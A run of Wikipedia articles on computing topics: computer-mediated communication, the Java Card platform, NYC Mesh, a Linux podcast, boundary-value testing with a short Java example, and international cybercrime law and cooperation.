List of pioneers in computer science
History of computing
Timeline of computing
History of computing hardware
IBM 700/7000 series
References
Further reading
1954, "Russian is turned into English by a fast electronic translator" by Robert K.Plumb in: The New York Times, 8 January 1954, p. 1 (front page),col.5.
1996, "Update," in: Computer, vol. 29, no. 7, pp. 92–94, Jul., 1996
External links
Cuthbert C. Hurd Papers, 1946-1992 at the Charles Babbage Institute, University of Minnesota.
Three oral history interviews with Cuthbert Hurd, 20 January 1981, 18 November 1994 and August 28 1995, Charles Babbage Institute, University of Minnesota. Hurd discusses International Business Machines research in computer technology, IBM's support for academic research on computers, and his own work at IBM—especially on the IBM 701, 704 and 705 computers. He also describes John von Neumann and his contributions to the development of computer technology. Discusses interactions with Oak Ridge National Laboratory and Los Alamos National Laboratory.
1911 births
1996 deaths
American computer scientists
IBM employees
United States Coast Guard officers
People from Estherville, Iowa
People from Portola Valley, California
Military personnel from California
Military personnel from Iowa
|
320498
|
https://en.wikipedia.org/wiki/Computer-mediated%20communication
|
Computer-mediated communication
|
Computer-mediated communication (CMC) is defined as any human communication that occurs through the use of two or more electronic devices. While the term has traditionally referred to those communications that occur via computer-mediated formats (e.g., instant messaging, email, chat rooms, online forums, social network services), it has also been applied to other forms of text-based interaction such as text messaging. Research on CMC focuses largely on the social effects of different computer-supported communication technologies. Many recent studies involve Internet-based social networking supported by social software.
Forms
Computer-mediated communication can be broken down into two forms: synchronous and asynchronous. Synchronous computer-mediated communication refers to communication that occurs in real-time. All parties are engaged in the communication simultaneously; however, they are not necessarily all in the same location. Examples of synchronous communication are video chats and FaceTime audio calls. On the contrary, asynchronous computer-mediated communication refers to communication that takes place when the parties engaged are not communicating in unison. In other words, the sender does not receive an immediate response from the receiver. Most forms of computer-mediated technology are asynchronous. Examples of asynchronous communication are text messages and emails.
Scope
Scholars from a variety of fields study phenomena that can be described under the umbrella term of computer-mediated communication (CMC) (see also Internet studies). For example, many take a sociopsychological approach to CMC by examining how humans use "computers" (or digital media) to manage interpersonal interaction, form impressions and maintain relationships. These studies have often focused on the differences between online and offline interactions, though contemporary research is moving towards the view that CMC should be studied as embedded in everyday life. Another branch of CMC research examines the use of paralinguistic features such as emoticons, pragmatic rules such as turn-taking and the sequential analysis and organization of talk, and the various sociolects, styles, registers or sets of terminology specific to these environments (see Leet). The study of language in these contexts is typically based on text-based forms of CMC, and is sometimes referred to as "computer-mediated discourse analysis".
The way humans communicate in professional, social, and educational settings varies widely, depending upon not only the environment but also the method of communication in which the communication occurs, which in this case is through computers or other information and communication technologies (ICTs). The study of communication to achieve collaboration—common work products—is termed computer-supported collaboration and includes only some of the concerns of other forms of CMC research.
Popular forms of CMC include e-mail, video, audio or text chat (text conferencing including "instant messaging"), bulletin board systems, list-servs, and MMOs. These settings are changing rapidly with the development of new technologies. Weblogs (blogs) have also become popular, and the exchange of RSS data has better enabled users to each "become their own publisher".
Characteristics
Communication occurring within a computer-mediated format has an effect on many different aspects of an interaction. Some of those that have received attention in the scholarly literature include impression formation, deception, group dynamics, disclosure reciprocity, disinhibition and especially relationship formation.
CMC is examined and compared to other communication media through a number of aspects thought to be universal to all forms of communication, including (but not limited to) synchronicity, persistence or "recordability", and anonymity. The association of these aspects with different forms of communication varies widely. For example, instant messaging is intrinsically synchronous but not persistent, since one loses all the content when one closes the dialog box unless one has a message log set up or has manually copy-pasted the conversation. E-mail and message boards, on the other hand, are low in synchronicity since response time varies, but high in persistence since messages sent and received are saved. Properties that separate CMC from other media also include transience, its multimodal nature, and its relative lack of governing codes of conduct. CMC is able to overcome physical and social limitations of other forms of communication and therefore allow the interaction of people who are not physically sharing the same space.
Technology would be a powerful tool when defining communication as a learning process that needs a sender and receiver. According to Nicholas Jankowski in his book The Contours of Multimedia, a third party, like software, acts in the middle between a sender and receiver. The sender is interacting with this third party to send. The receiver interacts with it as well, creating an additional interaction with the medium itself along with the initially intended one between sender and receiver.
The medium in which people choose to communicate influences the extent to which people disclose personal information. CMC is marked by higher levels of self-disclosure in conversation as opposed to face-to-face interactions. Self disclosure is any verbal communication of personally relevant information, thought, and feeling which establishes and maintains interpersonal relationships. This is due in part to visual anonymity and the absence of nonverbal cues which reduce concern for losing positive face. According to Walther’s (1996) hyperpersonal communication model, computer-mediated communication is valuable in providing a better communication and better first impressions. Moreover, Ramirez and Zhang (2007) indicate that computer-mediated communication allows more closeness and attraction between two individuals than a face-to-face communication. Online impression management, self-disclosure, attentiveness, expressivity, composure and other skills contribute to competence in computer mediated communication. In fact, there is a considerable correspondence of skills in computer-mediated and face-to-face interaction even though there is great diversity of online communication tools.
Anonymity and in part privacy and security depends more on the context and particular program being used or web page being visited. However, most researchers in the field acknowledge the importance of considering the psychological and social implications of these factors alongside the technical "limitations".
Language learning
CMC is widely discussed in language learning because CMC provides opportunities for language learners to practice their language. For example, Warschauer conducted several case studies on using email or discussion boards in different language classes. Warschauer claimed that information and communications technology “bridge the historic divide between speech...and writing”. Thus, considerable concern has arisen over the reading and writing research in L2 due to the booming of the Internet. In the learning process, students, especially kids, need cognitive learning, but they also need social interaction, which enhances their psychological needs. Although technology has its powerful effect in assisting the English language learners to learn, it can not be a comprehensive way that covers different aspects of the learning process.
Benefits
The nature of CMC means that it is easy for individuals to engage in communication with others regardless of time, location, or other spatial constraints to communication. In that CMC allows for individuals to collaborate on projects that would otherwise be impossible due to such factors as geography, it has enhanced social interaction not only between individuals but also in working life. In addition, CMC can also be useful for allowing individuals who might be intimidated due to factors like character or disabilities to participate in communication. By allowing an individual to communicate in a location of their choosing, a CMC call allows a person to engage in communication with minimal stress. Making an individual comfortable through CMC also plays a role in self-disclosure, which allows a communicative partner to open up more easily and be more expressive. When communicating through an electronic medium, individuals are less likely to engage in stereotyping and are less self-conscious about physical characteristics. The role that anonymity plays in online communication can also encourage some users to be less defensive and form relationships with others more rapidly.
Disadvantages
While computer-mediated communication can be beneficial, technological mediation can also inhibit the communication process. Unlike face-to-face communication, nonverbal cues such as tone and physical gestures, which assist in conveying the message, are lost through computer-mediated communication. As a result, the message being communicated is more vulnerable to being misunderstood due to a wrong interpretation of tone or word meaning. Moreover, according to Dr. Sobel-Lojeski of Stony Brook University and Professor Westwell of Flinders University, the virtual distance that is fundamental to computer-mediated communication can create a psychological and emotional sense of detachment, which can contribute to sentiments of societal isolation.
Crime
Cybersex trafficking and other cyber crimes involve computer-mediated communication. Cybercriminals can carry out the crimes in any location where they have a computer or tablet with a webcam or a smartphone with an internet connection. They also rely on social media networks, videoconferences, pornographic video sharing websites, dating pages, online chat rooms, apps, dark web sites, and other platforms. They use online payment systems and cryptocurrencies to hide their identities. Millions of reports of these crimes are sent to authorities annually. New laws and police procedures are needed to combat crimes involving CMC.
See also
Emotions in virtual communication
Internet relationship
Discourse community
References
Further reading
External links
Applied linguistics
Information systems
Internet culture
he:למידה משולבת מחשב
|
2070564
|
https://en.wikipedia.org/wiki/Java%20Card
|
Java Card
|
Oracle Java CardTM technology is a software platform technology that allows Java-based applications (applets) to be run securely on smart cards and more generally on similar secure small memory footprint deviceswhich are called “secure elements” (SE). A Secure Element is a tamper-resistant hardware environment capable of securely hosting applications and their confidential and cryptographic data. The most common form of secure element is a one-chip secure microcontroller, found in smart cards and other removable cryptographic tokens. But new form factors have started to emerge though, from embedded SEs (a non-removable secure microcontroller soldered onto a device board) to new security designs embedded into general purpose chips. Java CardTM addresses this hardware fragmentation and specificities while retaining the openness and code portability brought forward by Java. Java CardTM is the tiniest of Java platforms targeted for embedded devices. Java CardTM gives the user the ability to program the devices and make them application specific. It is widely used in different markets: wireless telecommunications within SIM cards and embedded SIM, payment within banking cards and NFC mobile payment and for Identity cards, healthcare cards, and passports. Several IoT products like gateways are also using Java CardTM based products to secure communications with a cloud service for instance. End users of Java CardTM technology include mobile operators, financial institutions, governments, mobile device makers, healthcare associations, enterprises and transportation authorities. Standards bodies such at ETSI, GlobalPlatform, GSMA and others leverage Java CardTM as part of their specifications.
The first Java CardTM was introduced in 1996 by Schlumberger's card division which later merged with Gemplus to form Gemalto. Java CardTM products are based on the specifications by Sun Microsystems and continued by Oracle Corporation. Many Java cardTM products also rely on the GlobalPlatform specifications for the secure management of applications on the card (download, installation, personalization, deletion).
The main design goals of the Java CardTM technology are portability, security and backward compatibility.
Portability
Java Card aims at defining a standard smart card computing environment allowing the same Java Card applet to run on different smart cards, much like a Java applet runs on different computers. As in Java, this is accomplished using the combination of a virtual machine (the Java Card Virtual Machine), and a well-defined runtime library, which largely abstracts the applet from differences between smart cards. Portability remains mitigated by issues of memory size, performance, and runtime support (e.g. for communication protocols or cryptographic algorithms).
Security
Java Card technology was originally developed for the purpose of securing sensitive information stored on smart cards. Security is determined by various aspects of this technology:
Data encapsulation Data is stored within the application, and Java Card applications are executed in an isolated environment (the Java Card VM), separate from the underlying operating system and hardware.
Applet firewall Unlike other Java VMs, a Java Card VM usually manages several applications, each one controlling sensitive data. Different applications are therefore separated from each other by an applet firewall which restricts and checks access of data elements of one applet to another.
Cryptography Commonly used symmetric key algorithms like DES, Triple DES, AES, and asymmetric key algorithms such as RSA, elliptic curve cryptography are supported as well as other cryptographic services like signing, key generation and key exchange.
Applet The applet is a state machine which processes only incoming command requests and responds by sending data or response status words back to the interface device.
Design
At the language level, Java Card is a precise subset of Java: all language constructs of Java Card exist in Java and behave identically. This goes to the point that as part of a standard build cycle, a Java Card program is compiled into a Java class file by a Java compiler; the class file is post-processed by tools specific to the Java Card platform.
However, many Java language features are not supported by Java Card (in particular types char, double, float and long; the transient qualifier; enums; arrays of more than one dimension; finalization; object cloning; threads). Further, some common features of Java are not provided at runtime by many actual smart cards (in particular type int, which is the default type of a Java expression; and garbage collection of objects).
Bytecode
Java Card bytecode run by the Java Card Virtual Machine is a functional subset of Java 2 bytecode run by a standard Java Virtual Machine but with a different encoding to optimize for size. A Java Card applet thus typically uses less bytecode than the hypothetical Java applet obtained by compiling the same Java source code. This conserves memory, a necessity in resource constrained devices like smart cards. As a design tradeoff, there is no support for some Java language features (as mentioned above), and size limitations. Techniques exist for overcoming the size limitations, such as dividing the application's code into packages below the 64 KiB limit.
Library and runtime
Standard Java Card class library and runtime support differs a lot from that in Java, and the common subset is minimal. For example, the Java Security Manager class is not supported in Java Card, where security policies are implemented by the Java Card Virtual Machine; and transients (non-persistent, fast RAM variables that can be class members) are supported via a Java Card class library, while they have native language support in Java.
Specific features
The Java Card runtime and virtual machine also support features that are specific to the Java Card platform:
Persistence With Java Card, objects are by default stored in persistent memory (RAM is very scarce on smart cards, and it is only used for temporary or security-sensitive objects). The runtime environment as well as the bytecode have therefore been adapted to manage persistent objects.
Atomicity As smart cards are externally powered and rely on persistent memory, persistent updates must be atomic. The individual write operations performed by individual bytecode instructions and API methods are therefore guaranteed atomic, and the Java Card Runtime includes a limited transaction mechanism.
Applet isolation The Java Card firewall is a mechanism that isolates the different applets present on a card from each other. It also includes a sharing mechanism that allows an applet to explicitly make an object available to other applets.
Development
Coding techniques used in a practical Java Card program differ significantly from those used in a Java program. Still, that Java Card uses a precise subset of the Java language speeds up the learning curve, and enables using a Java environment to develop and debug a Java Card program (caveat: even if debugging occurs with Java bytecode, make sure that the class file fits the limitation of Java Card language by converting it to Java Card bytecode; and test in a real Java Card smart card early on to get an idea of the performance); further, one can run and debug both the Java Card code for the application to be embedded in a smart card, and a Java application that will be in the host using the smart card, all working jointly in the same environment.
Versions
Oracle has released several Java Card platform specifications and is providing SDK tools for application development.
Usually smart card vendors implement just a subset of algorithms specified in Java Card platform target
and the only way to discover what subset of specification is implemented is to test the card.
Version 3.1 (17.12.2018)
Added configurable key pair generation support, named elliptic curves support, new algorithms and operations support, additional AES modes and Chinese algorithms.
Version 3.0.5 (03.06.2015)
Oracle SDK: Java Card Classic Development Kit 3.0.5u1 (03.06.2015)
Added support for Diffie-Hellman modular exponentiation, Domain Data Conservation for Diffie-Hellman, Elliptic Curve and DSA keys, RSA-3072, SHA3, plain ECDSA, AES CMAC, AES CTR.
Version 3.0.4 (06.08.2011)
Oracle SDK: Java Card Classic Development Kit 3.0.4 (06.11.2011)
Added support for DES MAC8 ISO9797.
Version 3.0.1 (15.06.2009)
Oracle SDK: Java Card Development Kit 3.0.3 RR (11.11.2010)
Added support for SHA-224, SHA-2 for all signature algorithms.
Version 2.2.2 (03.2006)
Oracle SDK: Java Card Development Kit 2.2.2 (03.2006)
Added support for SHA-256, SHA-384, SHA-512, ISO9796-2, HMAC, Korean SEED MAC NOPAD, Korean SEED NOPAD.
Version 2.2.1 (10.2003)
Oracle SDK: Java Card Development Kit 2.2.1 (10.2003)
Version 2.2 (11.2002)
Added support for AES cryptography key encapsulation, CRC algorithms, Elliptic Curve Cryptography key encapsulation,Diffie-Hellman key exchange using ECC, ECC keys for binary polynomial curves and for prime integer curves, AES, ECC and RSA with variable key lengths.
Version 2.1.1 (18.05.2000)
Oracle SDK: Java Card Development Kit 2.1.2 (05.04.2001)
Added support for RSA without padding.
Version 2.1 (07.06.1999)
Java Card 3.0
The version 3.0 of the Java Card specification (draft released in March 2008) is separated in two editions: the Classic Edition and the Connected Edition.
The Classic Edition (currently at version 3.0.5 released in June 2015) is an evolution of the Java Card Platform version 2 (which last version 2.2.2 was released in March 2006), which supports traditional card applets on resource-constrained devices such as Smart Cards. Older applets are generally compatible with newer Classic Edition devices, and applets for these newer devices can be compatible with older devices if not referring to new library functions. Smart Cards implementing Java Card Classic Edition have been security-certified by multiple vendors, and are commercially available.
The Connected Edition (currently at version 3.0.2 released in December 2009) aims to provide a new virtual machine and an enhanced execution environment with network-oriented features. Applications can be developed as classic card applets requested by APDU commands or as servlets using HTTP to support web-based schemes of communication (HTML, REST, SOAP ...) with the card. The runtime uses a subset of the Java (1.)6 bytecode, without Floating Point; it supports volatile objects (garbage collection), multithreading, inter-application communications facilities, persistence, transactions, card management facilities ... As of 2021, there has been little adoption in commercially available Smart Cards, so much that reference to Java Card (including in the present Wikipedia page) often implicitly excludes the Connected Edition.
See also
Java Card OpenPlatform
References
External links
Java Card overview (Oracle)
JavaCards-OpenSC
Java device platform
Smart cards
|
60662231
|
https://en.wikipedia.org/wiki/NYC%20Mesh
|
NYC Mesh
|
NYC Mesh is a physical network of interconnected routers and a group of enthusiasts working to support the expansion of the project as a freely accessible, open, wireless community network. NYC Mesh is not an internet service provider (ISP), although it does connect to the internet and offer internet access as a service to members. The network includes over 600 active member nodes throughout the five boroughs of New York City, with concentrations of users in lower Manhattan and Brooklyn.
Aim
The goal of NYC Mesh is to build a large scale, decentralized digital network, owned by those who run it, that will eventually cover all of New York City and neighboring urban areas.
Participation in the project is governed by its Network Commons License.
This agreement, partially modeled on a similar license in use by Guifi.net, lists four key tenets:
Participants are free to use the network for any purpose that does not limit the freedom of others to do the same,
Participants are free to know how the network and its components function,
Participants are free to offer and accept services on the network on their own terms, and
By joining the free network, participants agree to extend the network to others under the same conditions.
Other similar projects include Freifunk in Germany, Ninux in Italy, Sarantaporo.gr in Greece, the People's Open Network in Oakland, CA, and Red Hook Wi-Fi in Brooklyn, NY.
Technology
Like many other free community-driven networks, NYC Mesh uses mesh technology to facilitate robustness and resiliency. Additionally, between larger nodes, the project uses the Border Gateway Protocol (BGP). Nodes are connected via WiFi links similar to those used by wireless routers in homes, but with more powerful routers that are able to function as a backbone, making connections at distances up to a mile.
History
NYC Mesh was founded in 2012 and was originally based on the Cjdns protocol.
In 2015 the project received a grant from ISOC-NY, the New York chapter of the Internet Society.
NYC Mesh connects to the internet via the DE-CIX internet exchange point (IXP) at its first super node, Sabey Data Center at 375 Pearl Street, peering with companies such as Akamai, Apple, Google, and Hurricane Electric. Later, another supernode was opened up on the roof of Cologuard Brooklyn, another data center.
The project received a membership boost due to the U.S. Federal Communications Commission vote in December 2017 to repeal its 2015 net neutrality rules. Coinciding with this decision, the average number of member sign-ups requests per month jumped from about 20 to over 400.
See also
DIY networking
Mesh networking
Net neutrality
Freifunk
Guifi.net
References
External links
Community networks
Custom firmware
Mesh networking
Wireless
|
8954445
|
https://en.wikipedia.org/wiki/The%20Linux%20Link%20Tech%20Show
|
The Linux Link Tech Show
|
The Linux Link Tech Show is one of the longest running Linux podcasts in the world. Episode 500 aired on April 10, 2013.
Distribution
The Linux Link Tech Show is broadcast live on the internet every Wednesday at 8:30 P.M. Eastern Standard Time. Podcasts are made available shortly after under a Creative Commons license.
History
It was originally started by Lehigh Valley Linux User Group members Dann Washko and Linc Fessenden in September 2003. Allan Metzler, "the guy that brought the equipment", soon joined the show as a regular host in October of that year. In early 2005 Patrick Davila (who was a member of the same LUG as Dann and Linc) joined the show as a permanent host completing the current Tech Show lineup. Initially their goal was to simply provide "a weekly *live* webcast radio-style show about Linux and Technology", but they have since expanded out into podcasting. In fact, they were one of the very early adopters, and their very own Linc Fessenden wrote BashPodder, being unhappy with the current state of Linux podcast clients at the time.
In March 2009 it was announced several new guest hosts would be joining the show on a weekly rotating basis. The initial guest hosts include Chess Griffin, Dave Yates, Chad Wollenberg, Joel "Gorkon" Mclaughlin and Justin "threethirty" O'Brien.
The 365th show was recorded/broadcast on Wednesday the 4th of August 2010, when the hosts decided it was time to throw in the towel on their "1st season". The "2nd season" kicked off the weekend of September 11, 2010 during Ohio Linux Fest.
2014 Roster of Regular LocalHosts includes: Dann Washko, Dan "The Man" Frey, Pat Davila, Joel "Gorkon" McLaughlin, Rich "FlyingRich" Hughes, and T.J. "Pegwole" Werhley.
The hosts provide an entertaining viewpoint and have joked about being The Original Cockroaches of Podcasting. Their 13th anniversary broadcast of show 675 occurred on Wednesday September 21, 2016.
Guests
The Linux Link Tech Show have had a number of key figures (from 15 different countries) from the free and open source software community as guests. Guests have included Richard Stallman, Chris DiBona, Bruce Perens, Ian Murdock, Patrick Volkerding, Mark Shuttleworth, Nat Friedman, Ted Ts'o and Miguel de Icaza.
Further reading
OpenMoko Project Press Coverage Page
Software Freedom Law Center
KDE.org website
References
External links
HPR Community members remember the digital dragon
Interview of KDE Developer Aaron Seigo- Episode 101 in MP3 and OGG
Technology podcasts
|
1709986
|
https://en.wikipedia.org/wiki/Boundary-value%20analysis
|
Boundary-value analysis
|
Boundary-value analysis is a software testing technique in which tests are designed to include representatives of boundary values in a range. The idea comes from the boundary. Given that we have a set of test vectors to test the system, a topology can be defined on that set. Those inputs which belong to the same equivalence class as defined by the equivalence partitioning theory would constitute the basis. Given that the basis sets are neighbors, there would exist a boundary between them. The test vectors on either side of the boundary are called boundary values. In practice this would require that the test vectors can be ordered, and that the individual parameters follows some kind of order (either partial order or total order).
Formal definition
Formally the boundary values can be defined as below:
Let the set of the test vectors be .
Let's assume that there is an ordering relation defined over them, as .
Let be two equivalent classes.
Assume that test vector and .
If or then the classes are in the same neighborhood and the values are boundary values.
In plainer English, values on the minimum and maximum edges of an equivalence partition are tested. The values could be input or output ranges of a software component, can also be the internal implementation. Since these boundaries are common locations for errors that result in software faults they are frequently exercised in test cases.
Application
The expected input and output values to the software component should be extracted from the component specification. The values are then grouped into sets with identifiable boundaries. Each set, or partition, contains values that are expected to be processed by the component in the same way. Partitioning of test data ranges is explained in the equivalence partitioning test case design technique. It is important to consider both valid and invalid partitions when designing test cases.
The demonstration can be done using a function written in Java.
class Safe {
static int add(int a, int b)
{
int c = a + b ;
if (a >= 0 && b >= 0 && c < 0)
{
System.err.println("Overflow!");
}
if (a < 0 && b < 0 && c >= 0)
{
System.err.println("Underflow!");
}
return c;
}
}
On the basis of the code, the input vectors of are partitioned. The blocks we need to cover are the overflow statement
and the underflow statement and neither of these 2. That gives rise to 3 equivalent classes, from the code review itself.
we note that there is a fixed size of integer hence:-
We note that the input parameter a and b both are integers, hence total order exists on them.
When we compute the equalities:-
we get back the values which are on the boundary, inclusive, that is these pairs of are valid combinations,
and no underflow or overflow would happen for them.
On the other hand:-
gives pairs of which are invalid combinations,
Overflow would occur for them. In the same way:-
gives pairs of which are invalid combinations,
Underflow would occur for them.
Boundary values (drawn only for the overflow case) are being shown as the orange line in the right hand side figure.
For another example, if the input values were months of the year, expressed as integers, the input parameter 'month' might have the following partitions:
... -2 -1 0 1 .............. 12 13 14 15 .....
--------------|-------------------|-------------------
invalid partition 1 valid partition invalid partition 2
The boundary between two partitions is the place where the behavior of the application changes and is not a real number itself. The boundary value is the minimum (or maximum) value that is at the boundary. The number 0 is the maximum number in the first partition, the number 1 is the minimum value in the second partition, both are boundary values. Test cases should be created to generate inputs or outputs that will fall on and to either side of each boundary, which results in two cases per boundary. The test cases on each side of a boundary should be in the smallest increment possible for the component under test, for an integer this is 1, but if the input was a decimal with 2 places then it would be .01. In the example above there are boundary values at 0,1 and 12,13 and each should be tested.
Boundary value analysis does not require invalid partitions. Take an example where a heater is turned on if the temperature is 10 degrees or colder. There are two partitions (temperature≤10, temperature>10) and two boundary values to be tested (temperature=10, temperature=11).
Where a boundary value falls within the invalid partition the test case is designed to ensure the software component handles the value in a controlled manner. Boundary value analysis can be used throughout the testing cycle and is equally applicable at all testing phases.
References
The Testing Standards Working Party website.
Software testing
|
31567052
|
https://en.wikipedia.org/wiki/International%20cybercrime
|
International cybercrime
|
There is no commonly agreed single definition of “cybercrime”. It refers to illegal internet-mediated activities that often take place in global electronic networks. Cybercrime is "international" or "transnational" – there are ‘no cyber-borders between countries'. International cybercrimes often challenge the effectiveness of domestic and international law, and law enforcement. Because existing laws in many countries are not tailored to deal with cybercrime, criminals increasingly conduct crimes on the Internet in order to take advantages of the less severe punishments or difficulties of being traced. No matter, in developing or developed countries, governments and industries have gradually realized the colossal threats of cybercrime on economic and political security and public interests. However, complexity in types and forms of cybercrime increases the difficulty to fight back. In this sense, fighting cybercrime calls for international cooperation. Various organizations and governments have already made joint efforts in establishing global standards of legislation and law enforcement both on a regional and on an international scale. China–United States cooperation is one of the most striking progress recently, because they are the top two source countries of cybercrime.
Information and communication technology (ICT) plays an important role in helping ensure interoperability and security based on global standards. General countermeasures have been adopted in cracking down cybercrime, such as legal measures in perfecting legislation and technical measures in tracking down crimes over the network, Internet content control, using public or private proxy and computer forensics, encryption and plausible deniability, etc. Due to the heterogeneity of law enforcement and technical countermeasures of different countries, this article will mainly focus on legislative and regulatory initiatives of international cooperation.
Typology
In terms of cybercrime, we may often associate it with various forms of Internet attacks, such as hacking, Trojans, malware (keyloggers), botnet, Denial-of-Service (DoS), spoofing, phishing, and vishing. Though cybercrime encompasses a broad range of illegal activities, it can be generally divided into five categories:
Intrusive Offenses
Illegal Access: “Hacking” is one of the major forms of offenses that refers to unlawful access to a computer system.
Data Espionage: Offenders can intercept communications between users (such as e-mails) by targeting communication infrastructure such as fixed lines or wireless, and any Internet service (e.g., e-mail servers, chat or VoIP communications).
Data Interference: Offenders can violate the integrity of data and interfere with them by deleting, suppressing, or altering data and restricting access to them.
Content-related offenses
Pornographic Material (Child-Pornography): Sexually related content was among the first content to be commercially distributed over the Internet.
Racism, Hate Speech, Glorification of Violence: Radical groups use mass communication systems such as the Internet to spread propaganda.
Religious Offenses: A growing number of websites present material that is in some countries covered by provisions related to religious offenses, e.g., anti-religious written statements.
Spam: Offenders send out bulk mails by unidentified source and the mail server often contains useless advertisements and pictures.
Copyright and trademark-related offenses
Common copyright offenses: cyber copyright infringement of software, music or films.
Trademark violations: A well-known aspect of global trade. The most serious offenses include phishing and domain or name-related offenses, such as cybersquatting.
Computer-related offenses
Fraud: online auction fraud, advance fee fraud, credit card fraud, Internet banking
Forgery: manipulation of digital documents.
Identity theft: It refers to stealing private information including Social Security Numbers (SSN), passport numbers, Date of birth, addresses, phone numbers, and passwords for non-financial and financial accounts.
Combination offenses
Cyberterrorism: The main purposes of it are propaganda, information gathering, preparation of real-world attacks, publication of training material, communication, terrorist financing and attacks against critical infrastructure.
Cyberwarfare: It describes the use of ICTs in conducting warfare using the Internet.
Cyberlaundering: Conducting crime through the use of virtual currencies, online casinos etc.
Threats
Similar to conventional crime, economic benefits, power, revenge, adventure, ideology and lust are the core driving forces of cybercrime. Major threats caused by those motivations can be categorized as following:
Economic security, reputation and social trust are severely challenged by cyber fraud, counterfeiting, impersonation and concealment of identity, extortion, electronic money laundering, copyright infringement and tax evasion.
Public interest and national security is threatened by dissemination of offensive material —e.g., pornographic, defamatory or inflammatory/intrusive communication— cyber stalking/harassment, Child pornography and paedophilia, electronic vandalism/terrorism.
Privacy, domestic and even diplomatic information security are harmed by unauthorized access and misuse of ICT, denial of services, and illegal interception of communication.
Domestic, as well as international security are threatened by cybercrime due to its transnational characteristic. No single country can really handle this big issue on their own. It is imperative for us to collaborate and defend cybercrime on a global scale.
International trends
As more and more criminals are aware of potentially large economic gains that can be achieved with cybercrime, they tend to switch from simple adventure and vandalism to more targeted attacks, especially platforms where valuable information highly concentrates, such as computer, mobile devices and the Cloud. There are several emerging international trends of cybercrime.
Platform switch: Cybercrime is switching its battle ground from Windows-system PCs to other platforms, including mobile phones, tablet computers, and VoIP. Because a significant threshold in vulnerabilities has been reached. PC vendors are building better security into their products by providing faster updates, patches and user alert to potential flaws. Besides, global mobile devices’ penetration—from smart phones to tablet PCs—accessing the Internet by 2013 will surpass 1 billion, creating more opportunities for cybercrime. The massively successful banking Trojan, Zeus is already being adapted for the mobile platform. Smishing, or SMS phishing, is another method cyber criminals are using to exploit mobile devices, which users download after falling prey to a social engineering ploy, is designed to defeat the SMS-based two-factor authentication most banks use to confirm online funds transfers by customers. VoIP systems are being used to support vishing (telephone-based phishing) schemes, which are now growing in popularity.
Social engineering scams: It refers to a non-technical kind of intrusion, in the form of e-mails or social networking chats, that relies heavily on human interaction and often involves fooling potential victims into downloading malware or leaking personal data. Social engineering is nevertheless highly effective for attacking well-protected computer systems with the exploitation of trust. Social networking becomes an increasingly important tool for cyber criminals to recruit money mules to assist their money laundering operations around the globe. Spammers are not only spoofing social networking messages to persuade targets to click on links in emails — they are taking advantage of users’ trust of their social networking connections to attract new victims.
Highly targeted: The newest twist in "hypertargeting" is malware that is meant to disrupt industrial systems — such as the Stuxnet network worm, which exploits zero-day vulnerabilities in Microsoft. The first known copy of the worm was discovered in a plant in Germany. A subsequent variant led to a widespread global outbreak.
Dissemination and use of malware: malware generally takes the form of a virus, a worm, a Trojan horse, or spyware. In 2009, the majority of malware connects to host Web sites registered in the U.S.A. (51.4%), with China second (17.2%), and Spain third (15.7%). A primary means of malware dissemination is email. It is truly international in scope.
Intellectual property theft (IP theft): It is estimated that 90% of the software, DVDs, and CDs sold in some countries are counterfeit, and that the total global trade in counterfeit goods is more than $600 billion a year. In the USA alone, IP theft costs businesses an estimated $250 billion annually, and 750,000 jobs.
International legislative responses and cooperation
International responses
G8
Group of Eight (G8) is made up of the heads of eight industrialized countries: the U.S., the United Kingdom, Russia, France, Italy, Japan, Germany, and Canada.
In 1997, G8 released a Ministers' Communiqué that includes an action plan and principles to combat cybercrime and protect data and systems from unauthorized impairment. G8 also mandates that all law enforcement personnel must be trained and equipped to address cybercrime, and designates all member countries to have a point of contact on a 24 hours a day/7 days a week basis.
United Nations
In 1990 the UN General Assembly adopted a resolution dealing with computer crime legislation.
In 2000 the UN GA adopted a resolution on combating the criminal misuse of information technology.
In 2002 the UN GA adopted a second resolution on the criminal misuse of information technology.
ITU
The International Telecommunication Union (ITU), as a specialized agency within the United Nations, plays a leading role in the standardization and development of telecommunications and cybersecurity issues. The ITU was the lead agency of the World Summit on the Information Society (WSIS).
In 2003, Geneva Declaration of Principles and the Geneva Plan of Action were released, which highlights the importance of measures in the fight against cybercrime.
In 2005, the Tunis Commitment and the Tunis Agenda were adopted for the Information Society.
Council of Europe
Council of Europe is an international organisation focusing on the development of human rights and democracy in its 47 European member states.
In 2001, the Convention on Cybercrime, the first international convention aimed at Internet criminal behaviors, was co-drafted by the Council of Europe with the addition of USA, Canada, and Japan and signed by its 46 member states. But only 25 countries ratified later. [8] It aims at providing the basis of an effective legal framework for fighting cybercrime, through harmonization of cybercriminal offenses qualification, provision for laws empowering law enforcement and enabling international cooperation.
Regional responses
APEC
Asia-Pacific Economic Cooperation (APEC) is an international forum that seeks to promote promoting open trade and practical economic cooperation in the Asia-Pacific Region.
In 2002, APEC issued Cybersecurity Strategy which is included in the Shanghai Declaration. The strategy outlined six areas for co-operation among member economies including legal developments, information sharing and co-operation, security and technical guidelines, public awareness, and training and education.
OECD
The Organisation for Economic Co-operation and Development (OECD) is an international economic organisation of 34 countries founded in 1961 to stimulate economic progress and world trade.
In 1990, the Information, Computer and Communications Policy (ICCP) Committee created an Expert Group to develop a set of guidelines for information security that was drafted until 1992 and then adopted by the OECD Council. In 2002, OECD announced the completion of "Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security".
European Union
In 2001, the European Commission published a communication titled "Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime".
In 2002, EU presented a proposal for a “Framework Decision on Attacks against Information Systems”. The Framework Decision takes note of Convention on Cybercrime, but concentrates on the harmonisation of substantive criminal law provisions that are designed to protect infrastructure elements.
Commonwealth
In 2002, the Commonwealth of Nations presented a model law on cybercrime that provides a legal framework to harmonise legislation within the Commonwealth and enable international cooperation. The model law was intentionally drafted in accordance with the Convention on Cybercrime.
ECOWAS
The Economic Community of West African States (ECOWAS) is a regional group of west African Countries founded in 1975 it has fifteen member states. In 2009, ECOWAS adopted the Directive on Fighting Cybercrime in ECOWAS that provides a legal framework for the member states, which includes substantive criminal law as well as procedural law.
GCC
In 2007, the Arab League and Gulf Cooperation Council (GCC) recommended at a conference seeking a joint approach that takes into consideration international standards.
Voluntary industry response
During the past few years, public-private partnerships have emerged as a promising approach for tackling cybersecurity issues around the globe. Executive branch agencies (e.g., the Federal Trade Commission in US), regulatory agencies (e.g., Australian Communications and Media Authority), separate agencies (e.g., ENISA in the EU) and industry (e.g., MAAWG, …) are all involved in partnership.
